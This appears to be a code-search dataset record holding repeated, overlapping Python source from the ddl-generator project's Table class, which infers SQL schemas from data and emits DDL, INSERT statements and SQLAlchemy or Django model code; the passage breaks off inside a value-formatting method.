def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
"""
Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``.
"""
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result)
def __str__(self):
if self.default_dialect:
return self.ddl()
else:
return self.__repr__()
def _fill_metadata_from_sample(self, col):
col['pytype'] = type(col['sample_datum'])
if isinstance(col['sample_datum'], Decimal):
(precision, scale) = th.precision_and_scale(col['sample_datum'])
col['satype'] = sa.DECIMAL(precision + self.data_size_cushion*2,
scale + self.data_size_cushion)
elif isinstance(col['sample_datum'], str):
if self.varying_length_text:
col['satype'] = sa.Text()
else:
str_len = max(len(col['sample_datum']), col['str_length'])
col['satype'] = sa.Unicode(str_len+self.data_size_cushion*2)
else:
col['satype'] = self.types2sa[type(col['sample_datum'])]
if col['satype'] == sa.Integer and (
col['sample_datum'] > (2147483647-self.data_size_cushion*1000000000) or
col['sample_datum'] < (-2147483647+self.data_size_cushion*1000000000)):
col['satype'] = sa.BigInteger
return col
types2sa = {datetime.datetime: sa.DateTime, int: sa.Integer,
float: sa.Numeric, bool: sa.Boolean,
type(None): sa.Text}
def _determine_types(self):
column_data = OrderedDict()
self.columns = OrderedDict()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
for col in self.data.generator.sqla_columns:
self.columns[col.name] = {'is_nullable': col.nullable,
'is_unique': col.unique,
'satype': col.type,
'pytype': col.pytype}
return
self.comments = {}
rowcount = 0
for row in self.data:
rowcount += 1
keys = row.keys()
for col_name in self.columns:
if col_name not in keys:
self.columns[col_name]['is_nullable'] = True
if not isinstance(row, OrderedDict):
keys = sorted(keys)
for k in keys:
v_raw = row[k]
if not th.is_scalar(v_raw):
v = str(v_raw)
self.comments[k] = 'nested values! example:\n%s' % \
pprint.pformat(v)
logging.warning('in %s: %s' % (k, self.comments[k]))
v = th.coerce_to_specific(v_raw)
if k not in self.columns:
self.columns[k] = {'sample_datum': v,
'str_length': len(str(v_raw)),
'is_nullable': not (rowcount == 1 and
v is not None and
str(v).strip()
),
'is_unique': set([v, ])}
else:
col = self.columns[k]
col['str_length'] = max(col['str_length'], len(str(v_raw)))
old_sample_datum = col.get('sample_datum')
col['sample_datum'] = th.best_representative(
col['sample_datum'], v)
if (v is None) or (not str(v).strip()):
col['is_nullable'] = True
if (col['is_unique'] != False):
if v in col['is_unique']:
col['is_unique'] = False
else:
col['is_unique'].add(v)
for col_name in self.columns:
col = self.columns[col_name]
self._fill_metadata_from_sample(col)
col['is_unique'] = bool(col['is_unique'])
sqla_head = """
import datetime
# check for other imports you may need, like your db driver
from sqlalchemy import create_engine, MetaData, ForeignKey
engine = create_engine(r'sqlite:///:memory:')
metadata = MetaData(bind=engine)
conn = engine.connect()"""
def sqla_inserter_call(table_names):
return '''
def insert_test_rows(meta, conn):
"""Calls insert_* functions to create test data.
Given a SQLAlchemy metadata object ``meta`` and
a SQLAlchemy connection ``conn``, populate the tables
in ``meta`` with test data.
Call ``meta.reflect()`` before passing calling this."""
%s
''' % '\n'.join(" insert_%s(meta.tables['%s'], conn)" % (t, t)
for t in table_names)
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.ddl | python | def ddl(self, dialect=None, creates=True, drops=True):
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result) | Returns SQL to define the table. | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L263-L281 | [
"def _dialect(self, dialect):\n if not dialect and not self.default_dialect:\n raise KeyError(\"No SQL dialect specified\")\n dialect = dialect or self.default_dialect\n if dialect not in mock_engines:\n raise NotImplementedError(\"SQL dialect '%s' unknown\" % dialect)\n return dialect\n",... | class Table(object):
"""
>>> data = '''
... -
... name: Lancelot
... kg: 69.4
... dob: 9 jan 461
... -
... name: Gawain
... kg: 69.4 '''
>>> print(Table(data, "knights").ddl('postgresql').strip())
DROP TABLE IF EXISTS knights;
<BLANKLINE>
CREATE TABLE knights (
name VARCHAR(8) NOT NULL,
kg DECIMAL(3, 1) NOT NULL,
dob TIMESTAMP WITHOUT TIME ZONE,
UNIQUE (name),
UNIQUE (dob)
);
"""
table_index = 0
def _find_table_name(self, data):
if not self.table_name:
if pymongo and isinstance(data, pymongo.collection.Collection):
self.table_name = data.name
elif hasattr(data, 'lower'): # duck-type string test
if os.path.isfile(data):
(file_path, file_extension) = os.path.splitext(data)
self.table_name = os.path.split(file_path)[1].lower()
self.table_name = self.table_name or \
'generated_table%s' % Table.table_index
self.table_name = reshape.clean_key_name(self.table_name)
Table.table_index += 1
def __init__(self, data, table_name=None, default_dialect=None,
save_metadata_to=None, metadata_source=None,
varying_length_text=False, uniques=False,
pk_name=None, force_pk=False, data_size_cushion=0,
_parent_table=None, _fk_field_name=None, reorder=False,
loglevel=logging.WARN, limit=None):
"""
Initialize a Table and load its data.
If ``varying_length_text`` is ``True``,
text columns will be TEXT rather than VARCHAR.
This *improves* performance in PostgreSQL.
If a ``metadata<timestamp>`` YAML file generated
from a previous ddlgenerator run is
provided, *only* ``INSERT`` statements will be produced,
and the table structure
determined during the previous run will be assumed.
"""
self.source = data
logging.getLogger().setLevel(loglevel)
self.varying_length_text = varying_length_text
self.table_name = table_name
self.data_size_cushion = data_size_cushion
self._find_table_name(data)
# Send anything but Python data objects to
# data_dispenser.sources.Source
if isinstance(data, Source):
self.data = data
elif hasattr(data, 'lower') or hasattr(data, 'read'):
self.data = Source(data, limit=limit)
else:
try:
self.data = iter(data)
except TypeError:
self.data = Source(data)
if ( self.table_name.startswith('generated_table')
and hasattr(self.data, 'table_name')):
self.table_name = self.data.table_name
self.table_name = self.table_name.lower()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
children = {}
self.pk_name = next(col.name for col in self.data.generator.sqla_columns if col.primary_key)
else:
self.data = reshape.walk_and_clean(self.data)
(self.data, self.pk_name, children, child_fk_names
) = reshape.unnest_children(data=self.data,
parent_name=self.table_name,
pk_name=pk_name,
force_pk=force_pk)
self.default_dialect = default_dialect
self.comments = {}
child_metadata_sources = {}
if metadata_source:
if isinstance(metadata_source, OrderedDict):
logging.info('Column metadata passed in as OrderedDict')
self.columns = metadata_source
else:
logging.info('Pulling column metadata from file %s'
% metadata_source)
with open(metadata_source) as infile:
self.columns = yaml.load(infile.read())
for (col_name, col) in self.columns.items():
if isinstance(col, OrderedDict):
child_metadata_sources[col_name] = col
self.columns.pop(col_name)
else:
self._fill_metadata_from_sample(col)
else:
self._determine_types()
if reorder:
ordered_columns = OrderedDict()
if pk_name and pk_name in self.columns:
ordered_columns[pk_name] = self.columns.pop(pk_name)
for (c, v) in sorted(self.columns.items()):
ordered_columns[c] = v
self.columns = ordered_columns
if _parent_table:
fk = sa.ForeignKey('%s.%s' % (_parent_table.table_name,
_parent_table.pk_name))
else:
fk = None
self.table = sa.Table(self.table_name, metadata,
*[sa.Column(cname, col['satype'],
fk if fk and (_fk_field_name == cname)
else None,
primary_key=(cname == self.pk_name),
unique=(uniques and col['is_unique']),
nullable=col['is_nullable'],
doc=self.comments.get(cname))
for (cname, col) in self.columns.items()
if True
])
self.children = {child_name: Table(child_data, table_name=child_name,
default_dialect=self.default_dialect,
varying_length_text=varying_length_text,
uniques=uniques, pk_name=pk_name,
force_pk=force_pk, data_size_cushion=data_size_cushion,
_parent_table=self, reorder=reorder,
_fk_field_name=child_fk_names[child_name],
metadata_source=child_metadata_sources.get(child_name),
loglevel=loglevel)
for (child_name, child_data) in children.items()}
if save_metadata_to:
if not save_metadata_to.endswith(('.yml', 'yaml')):
save_metadata_to += '.yaml'
with open(save_metadata_to, 'w') as outfile:
outfile.write(yaml.dump(self._saveable_metadata()))
logging.info('Pass ``--save-metadata-to %s`` next time to re-use structure' %
save_metadata_to)
def _saveable_metadata(self):
result = copy.copy(self.columns)
for v in result.values():
v.pop('satype') # yaml chokes on sqla classes
for (child_name, child) in self.children.items():
result[child_name] = child._saveable_metadata()
return result
def _dialect(self, dialect):
if not dialect and not self.default_dialect:
raise KeyError("No SQL dialect specified")
dialect = dialect or self.default_dialect
if dialect not in mock_engines:
raise NotImplementedError("SQL dialect '%s' unknown" % dialect)
return dialect
_supports_if_exists = {k: False for k in dialect_names}
_supports_if_exists['postgresql'] = _supports_if_exists['sqlite'] = True
_supports_if_exists['mysql'] = _supports_if_exists['sybase'] = True
def _dropper(self, dialect):
template = "DROP TABLE %s %s"
if_exists = "IF EXISTS" if self._supports_if_exists[dialect] else ""
return template % (if_exists, self.table_name)
_comment_wrapper = textwrap.TextWrapper(initial_indent='-- ', subsequent_indent='-- ')
table_backref_remover = re.compile(r',\s+table\s*\=\<.*?\>')
capitalized_words = re.compile(r"\b[A-Z]\w+")
sqlalchemy_setup_template = textwrap.dedent("""
from sqlalchemy import %s
%s
%s.create()""" )
def sqlalchemy(self, is_top=True):
"""Dumps Python code to set up the table's SQLAlchemy model"""
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result
def django_models(self, metadata_source=None):
sql = self.sql(dialect='postgresql', inserts=False, creates=True,
drops=True, metadata_source=metadata_source)
u = sql.split(';\n')
try:
import django
except ImportError:
print('Cannot find Django on the current path. Is it installed?')
django = None
if django:
from django.conf import settings
from django.core import management
from django import setup
import sqlite3
import os
db_filename = 'generated_db.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
for i in u:
c.execute(i)
if not settings.configured:
settings.configure(
DEBUG='on',
SECRET_KEY='1234',
ALLOWED_HOSTS='localhost',
DATABASES = {'default' : {'NAME':db_filename,'ENGINE':'django.db.backends.sqlite3'}},
)
django.setup()
management.call_command('inspectdb', interactive=False)
os.remove(db_filename)
_datetime_format = {} # TODO: test the various RDBMS for power to read the standard
def _prep_datum(self, datum, dialect, col, needs_conversion):
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum
_insert_template = "INSERT INTO {table_name} ({cols}) VALUES ({vals});"
def emit_db_sequence_updates(self):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval
def inserts(self, dialect=None):
if dialect and dialect.startswith("sqla"):
if self.data:
yield "\ndef insert_%s(tbl, conn):" % self.table_name
yield " inserter = tbl.insert()"
for row in self.data:
yield textwrap.indent("conn.execute(inserter, **{row})"
.format(row=str(dict(row))),
" ")
for seq_updater in self.emit_db_sequence_updates():
yield ' conn.execute("%s")' % seq_updater
# TODO: no - not here
else:
yield "\n# No data for %s" % self.table.name
else:
dialect = self._dialect(dialect)
needs_conversion = not hasattr(self.data, 'generator') or not hasattr(self.data.generator, 'sqla_columns')
for row in self.data:
cols = ", ".join(c for c in row.keys())
vals = ", ".join(str(self._prep_datum(val, dialect, key, needs_conversion))
for (key, val) in row.items())
yield self._insert_template.format(table_name=self.table_name,
cols=cols, vals=vals)
for child in self.children.values():
for row in child.inserts(dialect):
yield row
def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
"""
Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``.
"""
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result)
def __str__(self):
if self.default_dialect:
return self.ddl()
else:
return self.__repr__()
def _fill_metadata_from_sample(self, col):
col['pytype'] = type(col['sample_datum'])
if isinstance(col['sample_datum'], Decimal):
(precision, scale) = th.precision_and_scale(col['sample_datum'])
col['satype'] = sa.DECIMAL(precision + self.data_size_cushion*2,
scale + self.data_size_cushion)
elif isinstance(col['sample_datum'], str):
if self.varying_length_text:
col['satype'] = sa.Text()
else:
str_len = max(len(col['sample_datum']), col['str_length'])
col['satype'] = sa.Unicode(str_len+self.data_size_cushion*2)
else:
col['satype'] = self.types2sa[type(col['sample_datum'])]
if col['satype'] == sa.Integer and (
col['sample_datum'] > (2147483647-self.data_size_cushion*1000000000) or
col['sample_datum'] < (-2147483647+self.data_size_cushion*1000000000)):
col['satype'] = sa.BigInteger
return col
types2sa = {datetime.datetime: sa.DateTime, int: sa.Integer,
float: sa.Numeric, bool: sa.Boolean,
type(None): sa.Text}
def _determine_types(self):
column_data = OrderedDict()
self.columns = OrderedDict()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
for col in self.data.generator.sqla_columns:
self.columns[col.name] = {'is_nullable': col.nullable,
'is_unique': col.unique,
'satype': col.type,
'pytype': col.pytype}
return
self.comments = {}
rowcount = 0
for row in self.data:
rowcount += 1
keys = row.keys()
for col_name in self.columns:
if col_name not in keys:
self.columns[col_name]['is_nullable'] = True
if not isinstance(row, OrderedDict):
keys = sorted(keys)
for k in keys:
v_raw = row[k]
if not th.is_scalar(v_raw):
v = str(v_raw)
self.comments[k] = 'nested values! example:\n%s' % \
pprint.pformat(v)
logging.warning('in %s: %s' % (k, self.comments[k]))
v = th.coerce_to_specific(v_raw)
if k not in self.columns:
self.columns[k] = {'sample_datum': v,
'str_length': len(str(v_raw)),
'is_nullable': not (rowcount == 1 and
v is not None and
str(v).strip()
),
'is_unique': set([v, ])}
else:
col = self.columns[k]
col['str_length'] = max(col['str_length'], len(str(v_raw)))
old_sample_datum = col.get('sample_datum')
col['sample_datum'] = th.best_representative(
col['sample_datum'], v)
if (v is None) or (not str(v).strip()):
col['is_nullable'] = True
if (col['is_unique'] != False):
if v in col['is_unique']:
col['is_unique'] = False
else:
col['is_unique'].add(v)
for col_name in self.columns:
col = self.columns[col_name]
self._fill_metadata_from_sample(col)
col['is_unique'] = bool(col['is_unique'])
|
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.sqlalchemy | python | def sqlalchemy(self, is_top=True):
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result | Dumps Python code to set up the table's SQLAlchemy model | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L292-L320 | null | class Table(object):
"""
>>> data = '''
... -
... name: Lancelot
... kg: 69.4
... dob: 9 jan 461
... -
... name: Gawain
... kg: 69.4 '''
>>> print(Table(data, "knights").ddl('postgresql').strip())
DROP TABLE IF EXISTS knights;
<BLANKLINE>
CREATE TABLE knights (
name VARCHAR(8) NOT NULL,
kg DECIMAL(3, 1) NOT NULL,
dob TIMESTAMP WITHOUT TIME ZONE,
UNIQUE (name),
UNIQUE (dob)
);
"""
table_index = 0
def _find_table_name(self, data):
if not self.table_name:
if pymongo and isinstance(data, pymongo.collection.Collection):
self.table_name = data.name
elif hasattr(data, 'lower'): # duck-type string test
if os.path.isfile(data):
(file_path, file_extension) = os.path.splitext(data)
self.table_name = os.path.split(file_path)[1].lower()
self.table_name = self.table_name or \
'generated_table%s' % Table.table_index
self.table_name = reshape.clean_key_name(self.table_name)
Table.table_index += 1
def __init__(self, data, table_name=None, default_dialect=None,
save_metadata_to=None, metadata_source=None,
varying_length_text=False, uniques=False,
pk_name=None, force_pk=False, data_size_cushion=0,
_parent_table=None, _fk_field_name=None, reorder=False,
loglevel=logging.WARN, limit=None):
"""
Initialize a Table and load its data.
If ``varying_length_text`` is ``True``,
text columns will be TEXT rather than VARCHAR.
This *improves* performance in PostgreSQL.
If a ``metadata<timestamp>`` YAML file generated
from a previous ddlgenerator run is
provided, *only* ``INSERT`` statements will be produced,
and the table structure
determined during the previous run will be assumed.
"""
self.source = data
logging.getLogger().setLevel(loglevel)
self.varying_length_text = varying_length_text
self.table_name = table_name
self.data_size_cushion = data_size_cushion
self._find_table_name(data)
# Send anything but Python data objects to
# data_dispenser.sources.Source
if isinstance(data, Source):
self.data = data
elif hasattr(data, 'lower') or hasattr(data, 'read'):
self.data = Source(data, limit=limit)
else:
try:
self.data = iter(data)
except TypeError:
self.data = Source(data)
if ( self.table_name.startswith('generated_table')
and hasattr(self.data, 'table_name')):
self.table_name = self.data.table_name
self.table_name = self.table_name.lower()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
children = {}
self.pk_name = next(col.name for col in self.data.generator.sqla_columns if col.primary_key)
else:
self.data = reshape.walk_and_clean(self.data)
(self.data, self.pk_name, children, child_fk_names
) = reshape.unnest_children(data=self.data,
parent_name=self.table_name,
pk_name=pk_name,
force_pk=force_pk)
self.default_dialect = default_dialect
self.comments = {}
child_metadata_sources = {}
if metadata_source:
if isinstance(metadata_source, OrderedDict):
logging.info('Column metadata passed in as OrderedDict')
self.columns = metadata_source
else:
logging.info('Pulling column metadata from file %s'
% metadata_source)
with open(metadata_source) as infile:
self.columns = yaml.load(infile.read())
for (col_name, col) in self.columns.items():
if isinstance(col, OrderedDict):
child_metadata_sources[col_name] = col
self.columns.pop(col_name)
else:
self._fill_metadata_from_sample(col)
else:
self._determine_types()
if reorder:
ordered_columns = OrderedDict()
if pk_name and pk_name in self.columns:
ordered_columns[pk_name] = self.columns.pop(pk_name)
for (c, v) in sorted(self.columns.items()):
ordered_columns[c] = v
self.columns = ordered_columns
if _parent_table:
fk = sa.ForeignKey('%s.%s' % (_parent_table.table_name,
_parent_table.pk_name))
else:
fk = None
self.table = sa.Table(self.table_name, metadata,
*[sa.Column(cname, col['satype'],
fk if fk and (_fk_field_name == cname)
else None,
primary_key=(cname == self.pk_name),
unique=(uniques and col['is_unique']),
nullable=col['is_nullable'],
doc=self.comments.get(cname))
for (cname, col) in self.columns.items()
if True
])
self.children = {child_name: Table(child_data, table_name=child_name,
default_dialect=self.default_dialect,
varying_length_text=varying_length_text,
uniques=uniques, pk_name=pk_name,
force_pk=force_pk, data_size_cushion=data_size_cushion,
_parent_table=self, reorder=reorder,
_fk_field_name=child_fk_names[child_name],
metadata_source=child_metadata_sources.get(child_name),
loglevel=loglevel)
for (child_name, child_data) in children.items()}
if save_metadata_to:
if not save_metadata_to.endswith(('.yml', 'yaml')):
save_metadata_to += '.yaml'
with open(save_metadata_to, 'w') as outfile:
outfile.write(yaml.dump(self._saveable_metadata()))
logging.info('Pass ``--save-metadata-to %s`` next time to re-use structure' %
save_metadata_to)
def _saveable_metadata(self):
result = copy.copy(self.columns)
for v in result.values():
v.pop('satype') # yaml chokes on sqla classes
for (child_name, child) in self.children.items():
result[child_name] = child._saveable_metadata()
return result
def _dialect(self, dialect):
if not dialect and not self.default_dialect:
raise KeyError("No SQL dialect specified")
dialect = dialect or self.default_dialect
if dialect not in mock_engines:
raise NotImplementedError("SQL dialect '%s' unknown" % dialect)
return dialect
_supports_if_exists = {k: False for k in dialect_names}
_supports_if_exists['postgresql'] = _supports_if_exists['sqlite'] = True
_supports_if_exists['mysql'] = _supports_if_exists['sybase'] = True
def _dropper(self, dialect):
template = "DROP TABLE %s %s"
if_exists = "IF EXISTS" if self._supports_if_exists[dialect] else ""
return template % (if_exists, self.table_name)
_comment_wrapper = textwrap.TextWrapper(initial_indent='-- ', subsequent_indent='-- ')
def ddl(self, dialect=None, creates=True, drops=True):
"""
Returns SQL to define the table.
"""
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result)
table_backref_remover = re.compile(r',\s+table\s*\=\<.*?\>')
capitalized_words = re.compile(r"\b[A-Z]\w+")
sqlalchemy_setup_template = textwrap.dedent("""
from sqlalchemy import %s
%s
%s.create()""" )
def django_models(self, metadata_source=None):
sql = self.sql(dialect='postgresql', inserts=False, creates=True,
drops=True, metadata_source=metadata_source)
u = sql.split(';\n')
try:
import django
except ImportError:
print('Cannot find Django on the current path. Is it installed?')
django = None
if django:
from django.conf import settings
from django.core import management
from django import setup
import sqlite3
import os
db_filename = 'generated_db.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
for i in u:
c.execute(i)
if not settings.configured:
settings.configure(
DEBUG='on',
SECRET_KEY='1234',
ALLOWED_HOSTS='localhost',
DATABASES = {'default' : {'NAME':db_filename,'ENGINE':'django.db.backends.sqlite3'}},
)
django.setup()
management.call_command('inspectdb', interactive=False)
os.remove(db_filename)
_datetime_format = {} # TODO: test the various RDBMS for power to read the standard
def _prep_datum(self, datum, dialect, col, needs_conversion):
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum
_insert_template = "INSERT INTO {table_name} ({cols}) VALUES ({vals});"
def emit_db_sequence_updates(self):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval
def inserts(self, dialect=None):
if dialect and dialect.startswith("sqla"):
if self.data:
yield "\ndef insert_%s(tbl, conn):" % self.table_name
yield " inserter = tbl.insert()"
for row in self.data:
yield textwrap.indent("conn.execute(inserter, **{row})"
.format(row=str(dict(row))),
" ")
for seq_updater in self.emit_db_sequence_updates():
yield ' conn.execute("%s")' % seq_updater
# TODO: no - not here
else:
yield "\n# No data for %s" % self.table.name
else:
dialect = self._dialect(dialect)
needs_conversion = not hasattr(self.data, 'generator') or not hasattr(self.data.generator, 'sqla_columns')
for row in self.data:
cols = ", ".join(c for c in row.keys())
vals = ", ".join(str(self._prep_datum(val, dialect, key, needs_conversion))
for (key, val) in row.items())
yield self._insert_template.format(table_name=self.table_name,
cols=cols, vals=vals)
for child in self.children.values():
for row in child.inserts(dialect):
yield row
def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
"""
Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``.
"""
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result)
def __str__(self):
if self.default_dialect:
return self.ddl()
else:
return self.__repr__()
def _fill_metadata_from_sample(self, col):
col['pytype'] = type(col['sample_datum'])
if isinstance(col['sample_datum'], Decimal):
(precision, scale) = th.precision_and_scale(col['sample_datum'])
col['satype'] = sa.DECIMAL(precision + self.data_size_cushion*2,
scale + self.data_size_cushion)
elif isinstance(col['sample_datum'], str):
if self.varying_length_text:
col['satype'] = sa.Text()
else:
str_len = max(len(col['sample_datum']), col['str_length'])
col['satype'] = sa.Unicode(str_len+self.data_size_cushion*2)
else:
col['satype'] = self.types2sa[type(col['sample_datum'])]
if col['satype'] == sa.Integer and (
col['sample_datum'] > (2147483647-self.data_size_cushion*1000000000) or
col['sample_datum'] < (-2147483647+self.data_size_cushion*1000000000)):
col['satype'] = sa.BigInteger
return col
types2sa = {datetime.datetime: sa.DateTime, int: sa.Integer,
float: sa.Numeric, bool: sa.Boolean,
type(None): sa.Text}
def _determine_types(self):
column_data = OrderedDict()
self.columns = OrderedDict()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
for col in self.data.generator.sqla_columns:
self.columns[col.name] = {'is_nullable': col.nullable,
'is_unique': col.unique,
'satype': col.type,
'pytype': col.pytype}
return
self.comments = {}
rowcount = 0
for row in self.data:
rowcount += 1
keys = row.keys()
for col_name in self.columns:
if col_name not in keys:
self.columns[col_name]['is_nullable'] = True
if not isinstance(row, OrderedDict):
keys = sorted(keys)
for k in keys:
v_raw = row[k]
if not th.is_scalar(v_raw):
v = str(v_raw)
self.comments[k] = 'nested values! example:\n%s' % \
pprint.pformat(v)
logging.warning('in %s: %s' % (k, self.comments[k]))
v = th.coerce_to_specific(v_raw)
if k not in self.columns:
self.columns[k] = {'sample_datum': v,
'str_length': len(str(v_raw)),
'is_nullable': not (rowcount == 1 and
v is not None and
str(v).strip()
),
'is_unique': set([v, ])}
else:
col = self.columns[k]
col['str_length'] = max(col['str_length'], len(str(v_raw)))
old_sample_datum = col.get('sample_datum')
col['sample_datum'] = th.best_representative(
col['sample_datum'], v)
if (v is None) or (not str(v).strip()):
col['is_nullable'] = True
if (col['is_unique'] != False):
if v in col['is_unique']:
col['is_unique'] = False
else:
col['is_unique'].add(v)
for col_name in self.columns:
col = self.columns[col_name]
self._fill_metadata_from_sample(col)
col['is_unique'] = bool(col['is_unique'])
|
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table._prep_datum | python | def _prep_datum(self, datum, dialect, col, needs_conversion):
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
